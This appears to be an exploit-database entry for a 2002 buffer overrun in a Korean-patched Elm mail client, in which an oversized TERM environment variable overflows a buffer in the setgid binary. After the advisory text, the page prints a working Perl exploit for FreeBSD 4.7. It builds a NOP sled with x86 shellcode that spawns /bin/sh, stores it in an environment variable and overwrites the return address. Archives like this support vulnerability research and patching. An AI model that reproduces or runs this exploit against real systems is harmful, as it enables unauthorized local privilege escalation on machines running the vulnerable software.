header-logo
Suggest Exploit
vendor:
ELM Mail User Agent, patched for Korean E-Mail
by:
kokaninATdtors.net and zillionATsafemode.org
7,2
CVSS
HIGH
Buffer Overrun
120
CWE
Product Name: ELM Mail User Agent, patched for Korean E-Mail
Affected Version From: ELM Mail User Agent, patched for Korean E-Mail 2.4h4.1
Affected Version To: ELM Mail User Agent, patched for Korean E-Mail 2.4h4.1
Patch Exists: YES
Related CWE: N/A
CPE: elm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD 4.7-RELEASE
2002

Buffer Overrun in Elm

A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun. As Elm is installed setgid on some systems, the exploitation of this vulnerability could potentially allow for the elevation of local privileges.

Mitigation:

Ensure that all user-supplied data is properly validated before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8030/info

A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun.

As Elm is installed setgid on some systems, the exploitation of this vulnerability could potentially allow for the elevation of local privileges.

# DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html
# shellcode by zillionATsafemode.org
# ko-elm-2.4h4.1      ELM Mail User Agent, patched for Korean E-Mail
# elm is setgid 'bin' 

$len = 512;
$ret = 0xbfbffd68;
$nop = "\x90";
$offset = 0;
$shellcode = 	"\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
		"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
		"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
              
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
  
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
local($ENV{'EGG'}) = $buffer; 
local($ENV{'TERM'}) = $new_ret x 12; 
exec("elm");